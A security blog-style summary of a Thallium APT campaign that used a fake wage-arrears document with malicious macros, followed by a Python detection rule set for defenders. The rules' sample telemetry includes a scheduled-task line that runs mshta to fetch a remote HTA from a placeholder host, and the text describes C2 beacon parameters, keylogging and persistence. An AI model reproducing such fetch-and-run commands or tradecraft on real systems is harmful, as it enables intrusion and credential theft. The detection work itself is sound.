Thallium group carries out attack using a domestic blockchain company's wage-arrears confirmation document

2020-12-17 ESTSecurity: Thallium group carried out an attack using a wage-arrears confirmation document (체불확인원) belonging to a domestic blockchain company.

https://blog.alyac.co.kr/3458


ESRC analyzed a malicious DOC lure impersonating a wage-arrears confirmation document for a South Korean blockchain company and assessed it as part of Thallium’s Smoke Screen APT campaign. Enabling macros caused the document to contact www.hahae.co[.]kr via cross.php with parameters such as op=1, dt=1214, and uid=01, while altering Office VBAWarnings settings and collecting system, process, and installed-program information into XML files for Base64 exfiltration. The malware also registered a scheduled task named AhnlabUpdate to repeatedly fetch suf.hta and stage additional commands through cross.php op=2/op=3. The follow-on payload included Base64-encoded PowerShell keylogging functionality, showing a fileless persistence-and-theft chain tied to known Thallium tradecraft.
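A defender-side triage rule set for the chain summarized above, added here as an example and not taken from the ESRC report: it parses constructed endpoint telemetry (registry writes, scheduled-task creation, HTTP requests), labels the stages the summary describes (the VBAWarnings change, the AhnlabUpdate lookalike task, cross.php op=1/2/3 beacons, suf.hta fetches) and singles out hosts that show more than one stage. The host names, the c2.invalid placeholder domain and the key="value" log format are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlparse, parse_qs

# Constructed sample telemetry (not from the report), one key="value" event per line.
# c2.invalid is a placeholder for the reported domain; rules key on behaviour, not the host.
SAMPLE_EVENTS = [
    'host="PC1" type="registry" proc="WINWORD.EXE" key="HKCU\\Software\\Microsoft\\Office\\16.0\\Word\\Security\\VBAWarnings" value="1"',
    'host="PC1" type="task" proc="cmd.exe" name="AhnlabUpdate" cmd="mshta http://c2.invalid/suf.hta"',
    'host="PC1" type="http" proc="mshta.exe" url="http://c2.invalid/cross.php?op=1&dt=1214&uid=01"',
    'host="PC1" type="http" proc="mshta.exe" url="http://c2.invalid/suf.hta"',
    'host="PC2" type="http" proc="chrome.exe" url="https://shop.example/index.php?op=1"',
    'host="PC2" type="task" proc="services.exe" name="AhnLab Update" cmd="C:\\Program Files\\AhnLab\\Update.exe"',
]
FIELD = re.compile(r'(\w+)="([^"]*)"')
SCRIPT_HOSTS = ("mshta", "powershell", "wscript", "cscript", "cmd.exe")

def classify(ev):
    """Map one parsed event to a stage of the chain described above, or None."""
    t = ev.get("type")
    if t == "registry" and ev.get("key", "").lower().endswith("\\security\\vbawarnings"):
        return "office_macro_security_modified"   # macro warning setting tampered with
    if t == "task":
        name = ev.get("name", "").lower().replace(" ", "")
        # vendor-lookalike task name whose action is a script host rather than a product binary
        if name == "ahnlabupdate" and any(b in ev.get("cmd", "").lower() for b in SCRIPT_HOSTS):
            return "lookalike_task_ahnlabupdate"
    if t == "http":
        u = urlparse(ev.get("url", ""))
        op = parse_qs(u.query).get("op", [""])[0]
        if u.path.lower().endswith("/cross.php") and op in {"1", "2", "3"}:
            return "c2_cross_php_op"              # beacon and command staging
        if u.path.lower().endswith("/suf.hta"):
            return "hta_stage_fetch"              # HTA pulled by the scheduled task
    return None

def detect(lines):
    """Return {host: sorted stage labels} for every host with at least one hit."""
    hits = defaultdict(set)
    for line in lines:
        ev = dict(FIELD.findall(line))          # parse key="value" fields
        label = classify(ev)
        if label:
            hits[ev.get("host", "?")].add(label)
    return {h: sorted(s) for h, s in hits.items()}

def chained_hosts(findings, min_stages=2):
    """Hosts showing several distinct stages: far stronger evidence than any single IoC."""
    return sorted(h for h, s in findings.items() if len(s) >= min_stages)
```

Running `detect(SAMPLE_EVENTS)` flags only PC1, with all four stages, while PC2's genuine vendor updater task and an unrelated `op=1` query produce no hits.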
